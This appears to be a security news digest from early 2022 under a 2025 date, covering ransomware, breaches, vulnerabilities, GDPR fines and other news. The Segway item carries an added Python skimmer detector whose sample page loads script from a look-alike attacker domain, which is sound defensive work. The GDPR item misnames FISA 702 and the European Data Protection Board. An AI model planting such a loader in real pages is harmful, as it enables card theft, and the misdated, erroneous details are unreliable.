Sunday, January 19, 2025

Hacktivists Claim Ransomware Strike on Belarus Railway Intended to Disrupt Russian Forces


As the political crisis in Ukraine deepens, warfare is evolving with the times. Hacktivism is not dead, although it hasn’t been in the news quite as much as financially driven ransomware incidents these past few years.

In an apparent bid to stop a Russian arms build-up near the Ukrainian border, a “pro-democracy” hacktivist group claims to have hacked the Belarusian railway system—allegedly one of the conduits for tanks and weaponry into the region. The incident comes as Russian and NATO-allied forces continue to spar over the political future of Ukraine, heightening the risk of war.

Belarus, which sits to the north of Ukraine, is considered a key Kremlin ally in the ongoing conflict and has seen an accumulation of Russian soldiers and weaponry as the two nations prepare for upcoming joint military exercises. U.S. commentators have accused Russia of using Belarus and the exercises as an excuse to “encircle” Ukraine militarily.

In a post to its Telegram page on Monday, the hacktivist group known as Cyber Partisans claimed to have struck the nation’s railway system—apparently spiking it with ransomware as a way to deter further transfers of arms. The hackers also published images of what they said were files compromised in the attack, and demanded the release of numerous “political prisoners,” who they said had been illegitimately incarcerated by the government.

“The government continues to suppress the free will of Belarusians, imprison innocent people, they continue to unlawfully keep… thousands of political prisoners,” the hackers told Ars Technica. They also decried the government for allowing “occupying troops” into their land—ostensibly a reference to Russia.

Partisans, which calls itself “pro-democracy,” is reputed to be comprised of disaffected Belarusian security personnel and has previously been tied to alleged hack-and-leak operations targeted at the government of President Alexander Lukashenko—the country’s current leader.

One of the first to spot the apparent railway hack was Franak Viačorka, a journalist and political advisor to Belarusian opposition leader and “pro-democracy activist” Sviatlana Tsikhanouskaya.


Viačorka, who has also worked with the Atlantic Council and is a media analyst for the US Agency for Global Media, told Gizmodo that he had learned about the cyberattack directly from “railroad workers.” Viačorka called the “scale” of the attack “huge,” and said that he expects there to be an “official statement” soon on the incident, as “some railroad services don’t work.”

While there doesn’t appear to be any official acknowledgment of the attack by the Belarusian government, a railway notification to travelers on Monday announced that certain “technical” difficulties were causing problems for electronic service delivery:

“For technical reasons, reference web-resources of the Belarusian Railways and services for issuing electronic travel documents are temporarily unavailable,” the railway announced. “To arrange travel and return electronic travel documents, please contact the ticket office.”

While this alone doesn’t confirm the hacktivists’ claims, it certainly sounds like one of the classic side-effects of a ransomware attack.

The ongoing standoff in Ukraine between Russian and pro-NATO forces has gotten to the point where, some say, political squabbles risk devolving into armed confrontation. The buildup of 100,000 Russian troops at Ukraine’s border has heightened tensions and led American officials to accuse Putin of wanting to invade the neighboring country.

More relevantly, multiple cyberattacks have targeted Ukraine over the past two weeks—a fact that has added to the growing conflict. This includes a Jan. 14 defacement attack on nearly 80 Ukrainian government websites, which was blamed on hackers connected to Belarusian intelligence. This makes the timing of the railway incident—a little over a week later—somewhat interesting.

On their Telegram page Monday, Cyber Partisans wrote that they had hacked the railway system to defy Belarusian President Lukashenko, who they dubbed a “terrorist”:

BelZhD at the command of the terrorist Lukashenko these days allows the occupying troops to enter our land. As part of the “Peklo” cyber campaign, we encrypted the bulk of the servers, databases and workstations of the BelZhD in order to slow down and disrupt the operation of the road. The backups have been destroyed.

The hackers claimed that “automation and security systems were deliberately NOT affected by a cyber attack in order to avoid emergency situations.”


California public office data breach


Some citizens’ personal information was available to view online

A misconfigured database managed by a California public office has potentially exposed the sensitive medical information of citizens.

County of Kings, in mid-California, announced that the security flaw in its public webserver made limited information on Covid-19 cases available on the internet.

The incident was discovered on November 24, 2021, and involved records obtained by the County’s Public Health Department from the California Department of Public Health and County healthcare providers.

An investigation determined that the misconfiguration resulted from an error made by a third-party contractor and existed on the county’s public webserver from February 15, 2021, until it was fully corrected on December 6, 2021.

In a notice (PDF) posted online, County of Kings said that names, dates of birth, addresses, and Covid-19-related health information were among the datasets available to view.

The government department said it has “no reason to believe that individuals’ information has been or will be misused”, but has informed all potential victims by post.

It added that no further action needs to be taken by the individuals, but has set up a dedicated call center, details of which can be found in the notice.


Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Segway website hacked and infected with payment card skimmer


Hackers have breached the Segway website and placed malicious code on its online store to collect payment card details from online shoppers.

“The website was compromised at least since January 6th,” antivirus maker Malwarebytes said on Monday.

The security firm said the attack was still ongoing at the time it published its blog post and security alert.

A spokesperson from Segway did not return a request for comment, but an inspection of the store’s source code suggests the company has removed the malicious code.

Segway website hacked and malicious code added

In a technical report on Monday, Malwarebytes said the attackers breached Segway’s Magento-based online store and then added a piece of JavaScript to the site that loaded malicious code from the booctstrap[.]com domain.

This code would activate when users would visit the store’s checkout page, collect information entered in the payment form, and send the data to a remote server.

The Malwarebytes Threat Intelligence Team said they linked the code to a threat actor known as Magecart Group 12.

Active since September 2018, this threat actor has been linked to several security incidents, including the compromise of Adverline, a French advertising agency, whose ads it used to place card-stealing code on hundreds of other sites, and the hack of a reseller of tickets for the Tokyo Olympics.

Based on its telemetry data, Malwarebytes said that most users who visited the compromised Segway site during the past three weeks were based in Australia and the US.
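A defensive check for the kind of injection described above, as an added example that is not from Malwarebytes or the original article: it lists script hosts that a checkout page references, in `src` attributes and inside inline scripts, that are not on an allowlist, and flags hosts whose name is within two edits of a well-known library name. The allowlist, the name list and the sample page are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumptions for this example (not from the report): the shop's approved
# script hosts, and library names that look-alike domains tend to imitate.
ALLOWED_HOSTS = {"store.example.com", "cdn.example.net"}
KNOWN_NAMES = ("bootstrap", "jquery", "cloudflare")

# URLs that appear inside inline JavaScript, e.g. a snippet that builds a
# <script> element at run time. JS comments can produce false positives.
URL_IN_JS = re.compile(r"(?:https?:)?//[A-Za-z0-9.-]+\.[A-Za-z]{2,}[^\s\"'<>]*")


class ScriptCollector(HTMLParser):
    """Collect script URLs from src attributes and from inline script bodies."""

    def __init__(self):
        super().__init__()
        self.urls = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            src = dict(attrs).get("src")
            if src:
                self.urls.append(src)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.urls.extend(URL_IN_JS.findall(data))


def edit_distance(a, b):
    """Levenshtein distance between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(host):
    """Return the known name that one of the host's labels nearly matches."""
    for label in host.split(".")[:-1]:          # ignore the top-level domain
        for name in KNOWN_NAMES:
            if 0 < edit_distance(label, name) <= 2:
                return name
    return None


def audit_scripts(html):
    """Return (host, imitated_name_or_None) for each script host not allowed."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings, seen = [], set()
    for url in parser.urls:
        host = urlparse(url).hostname           # None for relative URLs
        if host is None or host in ALLOWED_HOSTS or host in seen:
            continue
        seen.add(host)
        findings.append((host, lookalike_of(host)))
    return findings


# Constructed sample page. Only the look-alike domain name comes from the
# report; paths and the other hosts are made up for the example.
SAMPLE_PAGE = """
<html><head>
<script src="/static/checkout.js"></script>
<script src="https://cdn.example.net/lib/ui.min.js"></script>
<script src="https://metrics.example.org/tag.js"></script>
<script>var s=document.createElement("script");
s.src="//booctstrap.com/constructed-path.js";document.head.appendChild(s);</script>
</head><body>checkout form</body></html>
"""

if __name__ == "__main__":
    for host, imitated in audit_scripts(SAMPLE_PAGE):
        note = f" (resembles '{imitated}')" if imitated else ""
        print(f"unapproved script host: {host}{note}")
```

A static scan like this only sees what is in the served HTML; a Content-Security-Policy `script-src` allowlist enforces the same restriction in the shopper's browser.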


PrinterLogic RCE: vendor addresses triple threat against all connected endpoints


PrinterLogic has released security updates to address a total of nine vulnerabilities in Web Stack and Virtual Appliance, including three security defects that carry “high severity” ratings.

Tracked as CVE-2021-42631, CVE-2021-42635, and CVE-2021-42638, the three high-risk bugs can be exploited to launch remote code execution attacks, according to an advisory from the Paranoids vulnerability research team.

All three security flaws carry a CVSS base score of 8.1, but each is a different type of vulnerability: CVE-2021-42631 is an object injection bug, CVE-2021-42635 is a hardcoded APP_KEY issue, while CVE-2021-42638 is described as miscellaneous command injections.

To resolve these issues, PrinterLogic reorganized the impacted endpoints to eliminate the use of objects passed as parameters, modified the installers so that random keys would be generated, and completely removed areas affected by the command injections (where removal was not possible, escaping/sanitation was addressed).

The remaining security holes include: SQLi may disclose audit logs (CVE-2021-42633), blind SSRF (CVE-2021-42637), miscellaneous reflected XSS (CVE-2021-42639), driver assignment IDOR (CVE-2021-42640), username/email info disclosure (CVE-2021-42641), and printer console username/password info disclosure (CVE-2021-42642).

The Paranoids researchers noted that the majority of PrinterLogic installations are not directly accessible from the Internet.

“That means attackers would first need a privileged network position — such as access through a VPN or another (SSRF, perhaps) vulnerability in an appliance on the edge — to exploit the PrinterLogic Web Stack server,” the researchers explained.

The vulnerabilities impact all PrinterLogic Web Stack versions 19.1.1.13 SP9 and earlier, and Virtual Appliance versions 20.0.1304 and earlier, when used with macOS or Linux endpoint client software.

PrinterLogic Web Stack version 19.1.1.13-SP10 includes the necessary patches, but no client software updates are required for Virtual Appliance. In a separate advisory, PrinterLogic also notes that patches were automatically pushed to its SaaS platform worldwide.


Critical RCE in Dark Souls III Videogame, says Kaspersky


A dangerous vulnerability has been discovered in the Dark Souls III videogame that can be used to gain control of a gamer’s computer.

The gaming community is discussing a recent vulnerability in the Dark Souls III videogame. This RCE vulnerability allows attackers to remotely execute arbitrary code on a victim’s computer.

Apparently, the vulnerability also affects earlier games in the Dark Souls series: because of this, the developers have taken the unusual step of temporarily deactivating PvP servers across Dark Souls Remastered, Dark Souls II, and Dark Souls III.

According to the developers, they also plan to turn off servers for Dark Souls: Prepare To Die. Players fear that the same vulnerability could also affect the upcoming Elden Ring game, which is thought to use the same infrastructure. The bug is relevant only for PC users, so Xbox and PlayStation are unaffected.

Why Dark Souls vulnerability is so dangerous

This vulnerability allows an attacker to execute almost any program on the victim’s computer, so they’re able to steal confidential data or execute any program they wish (including installing malware).

You can find a demonstration of the exploit in the Twitch stream of the player named The_Grim_Sleeper in which an unknown person launched a PowerShell script on the streamer’s computer that used the Windows Narrator engine to read out critical notes about the gameplay.

What is the chance that Dark Souls vulnerability will be exploited ITW?

The details of the exploit for this vulnerability are not available to the general public, at least not yet. Despite the ethically dubious way of drawing attention to the problem, the person behind the attack apparently was not trying to cause any real harm. Judging by the discussion in the Dark Souls community, the creator of the exploit has been trying to inform the game’s developers about this serious vulnerability for some time, but they had ignored his messages. That’s why he decided to hack a popular streamer right during the streaming session.

However, this information is not 100% reliable; in reality, everything may not be so straightforward. For example, the creator of the exploit has already shared information about the vulnerability with the developers of the Blue Sentinel plugin, a mod for Dark Souls designed to counteract cheats. And one can only guess who else could get this information. Also, once the exploit has been demonstrated, other hackers may try to replicate it and use it to cause real harm to players. There are various possible scenarios here: attackers can use it to steal passwords from game accounts or crypto wallets, install good old ransomware, hidden miners, and much more.

How to stay safe from Dark Souls vulnerability?

Apparently, FromSoftware is currently trying to solve the problem. Let’s hope they can fix the vulnerability quickly. However, in the meantime, we recommend using high-quality security solutions for each device. Thanks to a special gaming mode, our antiviruses protect against all kinds of threats, including the exploitation of vulnerabilities, while consuming a minimum of PC resources and without interfering with the gameplay.


UAE Intercepts 2 Ballistic Missiles Targeting Abu Dhabi


The United Arab Emirates has intercepted two ballistic missiles targeting Abu Dhabi, the country’s defence ministry has said.

Yemen’s Houthi rebels claimed responsibility for the offensive, saying they targeted al-Dhafra Air Base and other areas in the Emirati capital – along with sites in the Dubai region and the Saudi areas of Jizan and Asir.

Houthi military spokesman Yehia Sarei warned that the UAE would continue to be a target “as long as attacks on the Yemeni people continue”.

This is the rebels’ second assault on Abu Dhabi in a week following unprecedented drone strikes that killed three people last Monday.

© Reuters Remains of a ballistic missile intercepted in an industrial area are seen in Saudi Arabia

The UAE is part of a Saudi-led coalition that has been at war with the Iran-backed Houthis for more than six years and was believed to be responsible for airstrikes that killed more than 80 people last week.

The Emirati defence ministry said the missiles were destroyed and there were no casualties.

Videos on social media appeared to show the sky light up before sunrise on Monday, with interceptor missiles moving through clouds to target the incoming fire.

Two explosions were later heard through the city and the missile fragments fell harmlessly to the ground, the state-run WAM news agency said.

The Emirati defence ministry tweeted out a black-and-white video that it said showed an F-16 striking the ballistic missile launcher used in the attack.

The site was identified as being near al-Jawaf, a Yemeni province around 1,400km southwest of Abu Dhabi.

On Sunday night, Saudi Arabia’s state media said the country had intercepted a missile and the fragments fell and injured two foreign nationals, causing damage in an industrial area near a southern region.

The Emirati defence ministry said it is “ready to deal with any threats” and “takes all necessary measures to protect the state from all attacks”.

At Al-Dhafra, which hosts both American and British forces, US personnel took shelter in bunkers during the attack, the US Air Force’s Mideast command said.

Traffic was disrupted into Abu Dhabi International Airport for about an hour after the attack.

The US embassy in Abu Dhabi later issued a security alert to Americans living in the UAE, telling citizens to “maintain a high level of security awareness”.

Instructions were provided on how to cope with missile attacks, which is previously unheard of given the UAE’s popularity as a safe tourist destination.

In a televised address, Houthi military spokesman Yehia Sarei said: “We warn foreign companies and investors to leave the Emirates.

“This has become an unsafe country.”


GDPR Fines Surged Sevenfold to $1.25 Billion in 2021: Study


Fines issued for GDPR non-compliance increased sevenfold from 2020 to 2021, analysis shows

In its latest annual GDPR summary, international law firm DLA Piper focuses attention in two areas: fines imposed and the evolving effect of the Schrems II ruling of 2020. Fines are increasing and Schrems II issues are becoming more complex.

GDPR fines

Fines issued for GDPR non-compliance increased significantly (sevenfold) in 2021, from €158.5 million (approximately $180 million) in 2020 to just under €1.1 billion (approximately $1.25 billion) in 2021. The largest fines came from Luxembourg against Amazon (€746 million / $846 million), and Ireland against WhatsApp (€225 million / $255 million). Both are currently being appealed.

The WhatsApp fine is interesting. The original fine proposed by the Irish Data Protection Commission (DPC) was for €30 million to €50 million. However, other European regulators objected, and the European Data Processing Board (EDPB) adjudicated – instructing Ireland to increase the fine by 350%. 

This is exactly the process activist Max Schrems is hoping for (actually, expecting) in his case in Ireland against Facebook. The Irish DPC has stated that Facebook is not contravening GDPR. Schrems believes that the other European regulators will object, and the EDPB will overturn the Irish decision.

The process illustrates the GDPR ‘one-stop shop’ principle in action. It is designed to prevent companies from looking for adjudication in countries with a history of lenient fines. One ruling covers the entire European Union, but other regulators can object to the ruling.

The DLA Piper report (PDF) also highlights what appears to be a divergence of approach between different European regulators. Some countries prefer a smaller number of large fines, while others seem to prefer a large number of small fines. This may, however, be influenced by the European headquarters location of the tech giants likely to attract the larger fines: WhatsApp, owned by Facebook, is headquartered in Ireland, while Amazon is headquartered in Luxembourg.

The report suggests there will be “significantly more complaints, investigations and enforcement activity this year in relation to cookies and similar tracking technologies.” It notes that the My Privacy is None of Your Business (NOYB) organization has issued 500 complaints to organizations for alleged breaches of cookie requirements, threatening formal complaints if the alleged infringement isn’t remedied.

Schrems II

Much of the DLA Piper report examines the growing effect of the Schrems II ruling of 2020. “The decision of Europe’s highest court in Schrems II in July 2020 was seismic,” notes the report. “The CJEU invalidated the Privacy Shield regime and left standard contractual clauses on life support.”

Schrems II applies to data transfers from Europe to any third-party country. In reality, it will primarily affect data transfers between the EU and the U.S. involving the large U.S. tech giants (Facebook, Google, Amazon, Microsoft etcetera).

The heart of the ruling is simple to understand. GDPR states that European personal data may not be exported to any country that does not have GDPR equivalent privacy rules. The U.S. does not have equivalent security – but has been considered a special case because of the volume of data transfers between the two blocs. Hence the Privacy Shield fudge to legalize transfers.

The Schrems II ruling invalidated the Privacy Shield. The basis is that U.S. government access to European personal data via FISA 720 is a fundamental contravention of GDPR. The same principle applies to standard contractual clauses (SCCs) because it is difficult to imagine how ‘contracts’ with European companies can prevent a lawful FISA 720 U.S. demand for access.

Technical measures to protect the data are still a possibility, but difficult in practice. Encryption could prevent U.S. government access, but only if the decryption keys cannot also be demanded by the government. This would require the company to have no access to the keys; but this would mean that without its own access it would not be able to process the data, and there would be little value to it.

The most obvious solution would be European localization of data – that is, for data collectors to keep the data on servers within the EU. However, this is also now questionable. In March 2021, a French court rejected a claim against the collection of COVID-19 data on an EU-hosted server that ultimately belonged to a U.S. company. The court ruled that in this case there were adequate provisions to protect the data.

Significantly, however, it also added that U.S. extra-territorial access to data held by U.S. companies is relevant to GDPR. “The ruling,” says DLA Piper, “implies that merely localizing and ring-fencing personal data in Europe may not be sufficient where the service provider is subject to extra-territorial laws that may result in access to personal data by public authorities in third countries; additional safeguards may be necessary to prevent access.”

Industry is still largely in a ‘wait and see’ phase over Schrems II. Neither EU governments nor the U.S. government wish to damage trade between the two blocs, and are both waiting to see how the problem plays out in the courts. Noticeably, there have been no Schrems II fines yet issued.

This cannot continue indefinitely. One month after the Schrems II judgment, Max Schrems raised 101 Schrems II-related complaints via the NOYB organization. These are now playing out in various courts. The Schrems versus Facebook case in Ireland is one example. The Google Analytics decision by the Austrian regulator (probably arriving too late for inclusion in DLA Piper’s report) is a second. More will follow – and there is no easy solution for business.

“Meeting the requirements of Schrems II and the EDPB recommendations is a challenge even for the most sophisticated and well-resourced organizations,” says the report, “and is beyond the means of many small and medium-sized enterprises.”

At a time of rising GDPR fines, Schrems II puts EU/U.S. data transfers between a rock (GDPR) and a hard place (FISA 720). GDPR is unlikely to be amended; FISA 720 is unlikely to be rescinded. For now, it is difficult to see any solution outside of new technical developments and business practices.


PowerPoint Files Used To Push Remote Access Trojans (RAT)


Since December 2021, a growing trend in phishing campaigns has emerged that uses malicious PowerPoint documents to distribute various types of malware, including remote access and information-stealing trojans.

According to a report by Netskope’s Threat Labs shared with Bleeping Computer before publication, the actors are using PowerPoint files combined with legitimate cloud services that host the malware payloads.

The families deployed in the tracked campaign are Warzone (aka AveMaria) and AgentTesla, two powerful RATs and info-stealers that target many applications, while the researchers also noticed the dropping of cryptocurrency stealers.

Sliding malware into Windows devices

The malicious PowerPoint phishing attachment contains an obfuscated macro executed via a combination of PowerShell and MSHTA, both built-in Windows tools.

The VBS script is then de-obfuscated and adds new Windows registry entries for persistence, leading to the execution of two scripts. The first one fetches AgentTesla from an external URL, and the second disables Windows Defender.

VBS execution stages
Source: Netskope

Additionally, the VBS creates a scheduled task that executes a script every hour, which fetches a PowerShell cryptocurrency stealer from a Blogger URL.

Blogger page abused for dropping payloads
Source: Netskope

The malware payloads

AgentTesla is a .NET-based RAT (remote access trojan) that can steal browser passwords, log keystrokes, steal clipboard contents, etc.

It is executed by PowerShell and comes slightly obfuscated, while there’s also a function that injects the payload into an instance of “aspnet_compiler.exe”.

PowerShell that executes AgentTesla
Source: Netskope

The second payload delivered in this campaign is Warzone, also a RAT, but Netskope doesn’t give many details about it in the report.

The cryptocurrency stealer is the third payload of this campaign, which checks the clipboard data with a regex that matches cryptocurrency wallet patterns. If found, it replaces the recipient’s address with one under the actor’s control.

The stealer supports Bitcoin, Ethereum, XMR, DOGE, and more. Netskope has published the complete list of IoCs (indicators of compromise) for this campaign, including all wallets used by the actors on this GitHub page.

Some of the wallets that adversaries use for snatching crypto
Source: Netskope

PowerPoint becoming a problem

In December 2021, Fortinet reported about a similar DHL-themed campaign that also used PowerPoint documents to drop Agent Tesla.

Users must treat this document type with as much vigilance as they do Excel files, since macro code in PowerPoint files can be equally dangerous and catastrophic.

In this case, the actors also threw cloud services in the mix, hosting their malicious payloads on various legitimate platforms that are unlikely to raise any red flags with security tools.

As such, the most dependable protection measure is to handle all unsolicited communications with caution and also to keep macros on your Microsoft Office suite disabled.


Alleged carder gang mastermind and three acolytes under arrest in Russia


Russian news agency Tass reported over the weekend that the “purported founder” of a notorious cybercrime group known as Infraud Organisation has been arrested.

In February 2018, the US Department of Justice (DOJ) unleashed indictments against 36 defendants alleged to be part of what the DOJ described at the time as:

[A] cybercriminal enterprise engaged in the large-scale acquisition, sale, and dissemination of stolen identities, compromised debit and credit cards, personally identifiable information, financial and banking information, computer malware, and other contraband.

As a side-effect of the American indictment, 13 people were arrested in seven different countries: Australia, France, Italy, Kosovo, Serbia, the UK and the US.

The DOJ claimed to have evidence at the time that Infraud Org, operating under the unrepentant motto In Fraud We Trust, was responsible for more than $500 million in actual losses, and more than $2 billion in what law enforcement referred to as “intended losses”.

The 36 defendants went by an eclectic range of online nicknames, including Best4Best, Goldenshop, Guapo1988, Moneymafia, Moviestar, Renegade11, Secureroot, Skizo, Validshop and Zo0mer.

One of those indicted back in 2018 was a certain Andrey Sergeevich Novak, also known as Unicc, also known as Faaxxx, also known as Faxtrod.

Novak, claims this weekend’s Tass report, which quotes an “informed source”, is one of four suspects now under arrest in Russia.

He was allegedly arrested two months ago – the report implies that he’s still in custody – along with three other members of the group whom Tass describes as “detained under house arrest”. (We’re assuming that the US equivalent would be that Novak didn’t make bail, while the other three did.)

None of the latter three were listed by name in the 2018 US indictment, although six of the 36 defendants were entered simply as John Doe, US jargon for “name unknown”.

“The investigation continues,” states Tass, “to establish the other members of the international hacking group.”


Assange Wins First Stage in Effort to Appeal US Extradition


WikiLeaks founder Julian Assange on Monday won the first stage of his effort to overturn a U.K. ruling that opened the door for his extradition to the U.S. to stand trial on espionage charges.

Assange Wins First Stage

The High Court in London gave Assange permission to appeal the case to the U.K. Supreme Court. But the Supreme Court must agree to accept the case before it can move forward.

“Make no mistake, we won today in court,” Assange’s fiancee, Stella Moris, said outside the courthouse, noting that he remains in custody at Belmarsh Prison in London.

“We will fight this until Julian is free,” she added.

The Supreme Court normally takes about eight sitting weeks after an application is submitted to decide whether to accept an appeal, the court says on its website.

The decision is the latest step in Assange’s long battle to avoid a trial in the U.S. on a series of charges related to WikiLeaks’ publication of classified documents more than a decade ago.

Just over a year ago, a district court judge in London rejected a U.S. extradition request on the grounds that Assange was likely to kill himself if held under harsh U.S. prison conditions. U.S. authorities later provided assurances that the WikiLeaks founder wouldn’t face the severe treatment his lawyers said would put his physical and mental health at risk.

The High Court last month overturned the lower court’s decision, saying that the U.S. promises were enough to guarantee Assange would be treated humanely.

Those assurances were the focus of Monday’s ruling by the High Court.

Assange’s lawyers are seeking to appeal because the U.S. offered its assurances after the lower court made its ruling. But the High Court overturned the lower court ruling, saying that the judge should have given the U.S. the opportunity to offer the assurances before she made her final ruling.

The High Court gave Assange permission to appeal so the Supreme Court can decide “in what circumstances can an appellate court receive assurances from a requesting state … in extradition proceedings.”

Assange’s lawyers have argued that the U.S. government’s pledge that Assange won’t be subjected to extreme conditions is meaningless because it’s conditional and could be changed at the discretion of American authorities.

The U.S. has asked British authorities to extradite Assange so he can stand trial on 17 charges of espionage and one charge of computer misuse linked to WikiLeaks’ publication of thousands of leaked military and diplomatic documents.

Assange, 50, has been held at the high-security Belmarsh Prison since 2019, when he was arrested for skipping bail during a separate legal battle. Before that, he spent seven years holed up inside Ecuador’s Embassy in London. Assange sought protection in the embassy in 2012 to avoid extradition to Sweden to face allegations of rape and sexual assault.

Sweden dropped the sex crimes investigations in November 2019 because so much time had elapsed.

American prosecutors say Assange unlawfully helped U.S. Army intelligence analyst Chelsea Manning steal classified diplomatic cables and military files that WikiLeaks later published, putting lives at risk.

Lawyers for Assange argue that their client shouldn’t have been charged because he was acting as a journalist and is protected by the First Amendment of the U.S. Constitution that guarantees freedom of the press. They say the documents he published exposed U.S. military wrongdoing in Iraq and Afghanistan.
